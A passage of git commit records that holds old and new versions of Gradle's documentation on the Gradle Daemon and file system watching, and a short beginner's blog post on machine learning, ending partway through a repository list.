That is, the code is progressively optimized during execution, which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in-memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects a lot of information about the state of the file system during every build.\nWhen <<sec:daemon_watch_fs,watching the file system>> is enabled, the Daemon can re-use the already collected information from the last build.\nThis can save a significant amount of time for incremental builds, where the number of changes to the file system between two builds is typically low.\n\n[[sec:daemon_watch_fs]]\n== Watching the file system\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects information about the file system in-memory during every build (aka _Virtual File System_).\nBy watching the file system, Gradle can keep the Virtual File System in sync with the file system even between builds.\nDoing so allows the Daemon to save the time to rebuild the Virtual File System from disk for the next build.\nFor incremental builds, there are typically only a few changes between builds.\nTherefore, incremental builds can re-use most of the Virtual File System from the last build and benefit the most from watching the file system.\n\nGradle uses operating system features for watching the file system.\nIt supports the feature on these operating systems and file systems:\n\n- Windows 10 with NTFS,\n- Linux (Ubuntu 16.04 or later, CentOS 8 or later, Red Hat Enterprise Linux 8 or later, Amazon Linux 2) using ext3 and ext4,\n- macOS 10.14 (Mojave) or later on APFS and HFS+.\n\nNetwork file systems like NFS and SMB are not supported.\nFAT file systems are not supported.\n\nWatching the file system is an experimental feature and is disabled by default.\nYou can enable the feature in a couple of ways:\n\nRun with `--watch-fs` on the command line::\nThis enables watching the file system for this build only.\nPut `org.gradle.vfs.watch=true` in your `gradle.properties`::\nThis enables watching the file system for all builds, unless explicitly disabled with `--no-watch-fs`.\n\n[[sec:daemon_watch_fs_troubleshooting]]\n=== Troubleshooting file system watching\n\nLimitations::\nFile system watching currently has the following limitations:\n- If you have symlinks in your build, you won\u2019t get the performance benefits for those locations (we plan to change this in the future).\n- When multiple daemons are running, the idle ones can pick up the changes produced by the others and create large log files with lots of debug info about the changes.\n- On Windows, we don\u2019t support SUBST and network drives (they might work, but we don\u2019t test them yet).\n\nGradle does not pick up some of my changes.::\n_Please https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nIf your build declares its 
inputs and outputs correctly, this should not happen.\nSo it\u2019s either a bug we need to fix, or your build is lacking the declaration of some inputs or outputs.\n\nWhy am I always getting \u201cReceived 8 file system events since last build\u201d even though I only changed one file?::\nThese are harmless notifications about changes to Gradle's own caches that happen after file watching has started.\n\n`Dropped VFS state due to lost state`::\n_Please https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nThis message means that either\n+\n--\n- the daemon received some unknown file system event,\n- too many changes happened, and the watching API couldn\u2019t handle it.\n--\nIn both cases the build cannot benefit from file system watching.\n\n`java.io.IOException: Too many open files`::\nIf you receive this error on macOS, you need to raise your open files limit, see https:\/\/superuser.com\/a\/443168\/8117[here].\n\n[[sec:inotify_watches_limit]]\n=== Linux-specific notes\n\nFile system watching uses http:\/\/en.wikipedia.org\/wiki\/Inotify[inotify] on Linux.\nDepending on the size of your build, it may be necessary to increase inotify limits.\nIf you are using an IDE, then you probably already had to increase the limits in the past.\n\nFile system watching uses one inotify watch per watched directory.\nYou can see the current limit of inotify watches per user by running:\n\n[source,bash]\n----\ncat \/proc\/sys\/fs\/inotify\/max_user_watches\n----\n\nTo increase the limit to e.g. 512K watches, run the following:\n\n[source,bash]\n----\necho 524288 | sudo tee -a \/etc\/sysctl.conf\nsudo sysctl -p --system\n----\n\nEach used inotify watch takes up to 1KB of memory.\nAssuming inotify uses all the 512K watches, around 500MB will be used for watching the file system.\nIf your environment is memory-constrained, you may want to disable file system watching.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. 
Simply configure whether you want to use it or not \u2014 everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. 
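\n\nFor example (a sketch; the PID shown is illustrative):\n\n[source,bash]\n----\ngradle --stop   # asks all Daemons of this Gradle version to terminate\njps             # a Daemon that is still running would be listed as: 28411 GradleDaemon\n----\n\n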
You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. >> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. a user account) so that all builds use the Daemon without requiring to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by an Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. 
`-Xmx1024m`), default text encoding, default locale, etc of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. The corresponding attributes of the requested build environment and the Daemon\u2019s environment must match exactly in order for a Daemon to be compatible.\n\n* The maximum heap size (i.e. the -Xmx JVM argument)\n* The minimum heap size (i.e. the -Xms JVM argument)\n* The boot classpath (i.e. the -Xbootclasspath argument)\n* The \u201cassertion\u201d status (i.e. the -ea argument)\n\nThe required Gradle version is another aspect of the requested build environment. Daemon processes are coupled to a specific Gradle runtime. Working on multiple Gradle projects during a session that use different Gradle versions is a common reason for having more than one running Daemon process.\n\n[[sec:how_much_memory_does_the_daemon_use_and_can_i_give_it_more]]\n=== How much memory does the Daemon use and can I give it more?\n\nIf the requested build environment does not specify a maximum heap size, the Daemon will use up to 512MB of heap. It will use the JVM's default minimum heap size. 512MB is more than enough for most builds. Larger builds with hundreds of subprojects, lots of configuration, and source code may require, or perform better, with more memory.\n\nTo increase the amount of memory the Daemon can use, specify the appropriate flags as part of the requested build environment. Please see <<build_environment.adoc#build_environment,Build Environment>> for details.\n\n[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after 3 hours of inactivity or less. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day to day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. 
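\n\nTo make the memory guidance above concrete: the Daemon heap can be raised through the requested build environment, for instance with the `org.gradle.jvmargs` entry in the user `gradle.properties` (a minimal sketch; the 2 gigabyte figure is an arbitrary example):\n\n[source,bash]\n----\n# Append a larger maximum heap for the Daemon JVM to the user gradle.properties:\necho \"org.gradle.jvmargs=-Xmx2g\" >> ~\/.gradle\/gradle.properties\n----\n\n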
While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and build environment in general) by running builds that do not release resources correctly. This is a particularly poignant problem when using Microsoft Windows as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<third_party_integration.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE you are using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the JVM implementation provided by Oracle and used as the basis of OpenJDK) applies optimization to code while it is running. The optimization is progressive and not instantaneous. That is, the code is progressively optimized during execution which means that subsequent builds can be faster purely due to this optimization process. Experiments with HotSpot have shown that it takes somewhere between 5 and 10 builds for optimization to stabilize. The difference in perceived build time between the first build and the 10th for a Daemon can be quite dramatic.\n\nThe Daemon also allows more effective in memory caching across builds. For example, the classes needed by the build (e.g. plugins, build scripts) can be held in memory between builds. 
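\n\nA crude way to observe the progressive optimization described above is to run the same trivial task repeatedly against one warm Daemon and watch the reported build times trend downwards over the first handful of runs (a sketch; `help` merely stands in for any cheap task):\n\n[source,bash]\n----\n# Repeat a cheap task ten times against the same Daemon; timings should stabilize.\nfor i in $(seq 10); do time gradle help; done\n----\n\n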
Similarly, Gradle can maintain in-memory caches of build data such as the hashes of task inputs and outputs, used for incremental building.\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects a lot of information about the state of the file system during every build.\nWhen <<sec:daemon_watch_fs,watching the file system>> is enabled, the Daemon can re-use the already collected information from the last build.\nThis can save a significant amount of time for incremental builds, where the number of changes to the file system between two builds is typically low.\n\n[[sec:daemon_watch_fs]]\n== Watching the file system\n\nTo detect changes on the file system, and to calculate what needs to be rebuilt, Gradle collects information about the file system in-memory during every build (aka _Virtual File System_).\nBy watching the file system, Gradle can keep the Virtual File System in sync with the file system even between builds.\nDoing so allows the Daemon to save the time to rebuild the Virtual File System from disk for the next build.\nFor incremental builds, there are typically only a few changes between builds.\nTherefore, incremental builds can re-use most of the Virtual File System from the last build and benefit the most from watching the file system.\n\nGradle uses operating system features for watching the file system.\nIt supports the feature on these operating systems and file systems:\n\n- Windows 10 with NTFS,\n- Linux (Ubuntu 16.04 or later, CentOS 8 or later, Red Hat Enterprise Linux 8 or later, Amazon Linux 2) using ext3 and ext4,\n- macOS 10.14 (Mojave) or later on APFS and HFS+.\n\nNetwork file systems like NFS and SMB are not supported.\nFAT file systems are not supported.\n\nWatching the file system is an experimental feature and is disabled by default.\nYou can enable the feature in a couple of ways:\n\nRun with `--watch-fs` on the command line::\nThis enables watching the file system for this build only.\nPut `org.gradle.vfs.watch=true` in your `gradle.properties`::\nThis enables watching the file system for all builds, unless explicitly disabled with `--no-watch-fs`.\n\n[[sec:daemon_watch_fs_troubleshooting]]\n=== Troubleshooting file system watching\n\nLimitations::\nWe are working on removing the following limitations to make file system watching production ready.\n- If you have symlinks in your build, you won\u2019t get the performance benefits for those locations (we plan to change this in the future).\n- When multiple daemons are running, the idle ones can pick up the changes produced by the others and create large log files with lots of debug info about the changes.\n- On Windows, we don\u2019t support SUBST and network drives (they might work, but we don\u2019t test them yet).\n\nGradle does not pick up some of my changes.::\n_Please https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nIf your build declares its inputs and outputs correctly, this should not happen.\nSo it\u2019s either a bug we need to fix, or your build is lacking the declaration of some inputs or outputs.\n\nWhy am I always getting \u201cReceived 8 file system events since last build\u201d even though I only changed one file?::\nThese are harmless notifications about changes to Gradle's own caches that happen after file watching has started.\n\n`Dropped VFS state due to lost state`::\n_Please 
https:\/\/gradle-community.slack.com\/app_redirect?channel=file-system-watching[let us know on the Gradle community Slack] if that happens to you._\nThis message means that either\n+\n--\n- the daemon received some unknown file system event,\n- too many changes happened, and the watching API couldn\u2019t handle it.\n--\nIn both cases the build cannot benefit from file system watching.\n\n`java.io.IOException: Too many open files`::\nIf you receive this error on macOS, you need to raise your open files limit, see https:\/\/superuser.com\/a\/443168\/8117[here].\n\n[[sec:inotify_watches_limit]]\n=== Linux-specific notes\n\nFile system watching uses http:\/\/en.wikipedia.org\/wiki\/Inotify[inotify] on Linux.\nDepending on the size of your build, it may be necessary to increase inotify limits.\nIf you are using an IDE, then you probably already had to increase the limits in the past.\n\nFile system watching uses one inotify watch per watched directory.\nYou can see the current limit of inotify watches per user by running:\n\n[source,bash]\n----\ncat \/proc\/sys\/fs\/inotify\/max_user_watches\n----\n\nTo increase the limit to e.g. 512K watches run the following:\n\n[source,bash]\n----\necho 524288 | sudo tee -a \/etc\/sysctl.conf\nsudo sysctl -p --system\n----\n\nEach used inotify watch takes up to 1KB of memory.\nAssuming inotify uses all the 512K watches then around 500MB will be used for watching the file system.\nIf your environment is memory constraint, you may want to disable file system watching.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5dab4e84ec57e89ab42a942be248a2ed48cf3ac0","subject":"Update 2015-06-12-Noobs-guide-to-Machine-Learning.adoc","message":"Update 2015-06-12-Noobs-guide-to-Machine-Learning.adoc","repos":"anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io,anuragsingh31\/anuragsingh31.github.io","old_file":"_posts\/2015-06-12-Noobs-guide-to-Machine-Learning.adoc","new_file":"_posts\/2015-06-12-Noobs-guide-to-Machine-Learning.adoc","new_contents":"= Noob's guide to Machine Learning\n:hp-tags: machine learning\n\n\nYou might be completely overwhelmed by the information available over the internet\nand must be wondering how to start the journey in the world of data analytics;\ndon't worry, we are here to help. Below you will find the must-know things to get\nstarted and learn everything about machine learning. +\n\nOne can directly get started using various available tools like R studio, Amazon machine learning as a service,\nAzure Machine learning, Anaconda (ipython) etc.,\nbut before you do that you must know the basics or building blocks of the machine learning approach.\n\n*Neural nets*\/ *Support Vector Machines* etc. might sound great, but model\nimplementation is the last step. The most important step is cleaning and processing the data;\nwe will talk about it later in detail.\n\nFor now, the following topics are the building blocks; we will post about each of\nthem in separate posts.\n\n\n\n\n. *Statistics*\n. *Linear Algebra*\n. *Data Cleaning*\n. *Data Processing (Dimension Reduction)*\n. *Feature Selection*\n\n\nIt's time to clean the dust off your Math\/Statistics book and revise the concepts of Linear algebra and Mean\/Mode\/Standard Deviation. While you do that, we will write the post\nabout the next step, where we will learn an algorithm *(PCA)* for data processing and get hands-on with the data cleaning and processing steps using Anaconda (ipython).\n\nDon't worry if this information also overwhelmed you; we will teach you\neach and everything. Just stick with us.\n\n*Happy Learning, See you next week*\n\n\n","old_contents":"= Noob's guide to Machine Learning\n:hp-tags: Machine Learning\n\nYou might be completely overwhelmed by the information available over the internet \nand must be looking on how to start the journey in the world of data analytics, \ndon\u2019t worry we are here to help , below you will find must know things to get started \nand learn everything about machine learning. \n\nOne can directly get started using various available tools like R studio, \nAmazon machine learning as a service Azure Machine learning, Anaconda(ipython) etc. \nbut before you do that you must know the basics or building blocks of machine learning approach.\n\n*Neural nets*\/ *Support Vector Machine* etc. might sound great but these model implementation is the last step.\nThe most important step is cleaning and processing the data, we will talk about it later in detail.\n\nFor now, following topics are the building blocks, we will post about each of them in separate posts .\n\n\t. Statistics\n . Linear Algebra\n\t. Data Cleaning\n\t. Data Processing (Dimension Reduction)\n . Feature Selection\n\nIt\u2019s time to clean the dust off your Math\/Statistics book and revise the concepts about Linear algebra \nand Mean\/Mode\/Standard Deviation , till you do that we will write the post about next step, \n\nwhere we will learn a algorithm (PCA) for data processing and get hands on data cleaning \nand processing step using Anaconda(ipython).\n\nDon\u2019t worry if this information also overwhelmed you , we will teach you each and everything, Just stick with us.\n\nHappy Learning, See you next week\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"6f17736eb1b92a0438c4639a27c04c2f2e97129d","subject":"Fixed asciidoc","message":"Fixed 
asciidoc\n","repos":"nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,wuranbo\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,ricardocerq\/elasticsearch,strapdata\/elassandra5-rc,mjason3\/elasticsearch,C-Bish\/elasticsearch,a2lin\/elasticsearch,zkidkid\/elasticsearch,nknize\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,MaineC\/elasticsearch,markwalkom\/elasticsearch,spiegela\/elasticsearch,JervyShi\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,obourgain\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,lks21c\/elasticsearch,dpursehouse\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,coding0011\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,nilabhsagar\/elasticsearch,obourgain\/elasticsearch,rlugojr\/elasticsearch,alexshadow007\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,winstonewert\/elasticsearch,wuranbo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,coding0011\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,nknize\/elasticsearch,rajanm\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,LewayneNaidoo\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra,geidies\/elasticsearch,fernandozhu\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,JSCooke\/elasticsearch,fforbeck\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,artnowo\/elasticsearch,Helen-Zhao\/elasticsearch,elasticdog\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,nezirus\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,wenpos\/elasticsearch,henakamaMSFT\/elasticsearch,liweinan0423\/elasticsearch,nilabhsagar\/elasticsearch,mikemccand\/elasticsearch,awislowski\/elasticsearch,dpursehouse\/elasticsearch,Stacey-Gammon\/elasticsearch,zkidkid\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,MisterAndersen\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,uschindler\/elasticsearch,geidies\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,girirajsharma\/elasticsearch,jimczi\/elasticsearch,awislowski\/elasticsearch,naveenhooda200
0\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,dpursehouse\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,JervyShi\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,StefanGor\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,GlenRSmith\/elasticsearch,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,StefanGor\/elasticsearch,girirajsharma\/elasticsearch,jimczi\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,sreeramjayan\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,robin13\/elasticsearch,bawse\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,fforbeck\/elasticsearch,brandonkearby\/elasticsearch,JervyShi\/elasticsearch,MaineC\/elasticsearch,jprante\/elasticsearch,sreeramjayan\/elasticsearch,fred84\/elasticsearch,dpursehouse\/elasticsearch,coding0011\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,ricardocerq\/elasticsearch,Helen-Zhao\/elasticsearch,mortonsykes\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,fernandozhu\/elasticsearch,spiegela\/elasticsearch,JackyMai\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,mikemccand\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,liweinan0423\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,mjason3\/elasticsearch,gmarz\/elasticsearch,uschindler\/elasticsearch,fforbeck\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,sreeramjayan\/elasticsearch,mikemccand\/elasticsearch,i-am-Nathan\/elasticsearch,liweinan0423\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elasticassandra,s1monw\/elasticsearch,mikemccand\/elasticsearch,umeshdangat\/elasticsearch,awislowski\/elasticsearch,pozhidaevak\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,gmarz\/elasticsearch,wangtuo\/elasticsearch,artnowo\/elasticsearch,JervyShi\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,brandonkearby\/elasticsearch,winstonewert\/elasticsearch,girirajsharma\/elasticsearch,elasticdog\/elasticsearch,girirajsharma\/elasticsearch,alexshadow007\/elasticsearch,gmarz\/elasticsearch,mjason3\/elasticsearch,IanvsPoplicola\/elasticsearch,yanjunh\/elasticsearch,gfyoung\/elasticsearch,wuranbo\/elasticsearch,strapdata\/elassandra,fernandozhu\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,liweinan0423\/elasticsearch,a2lin\/elasticsearch,ricardocerq\/elasticsearch,vroyer\/elassandra,a2lin\/elastic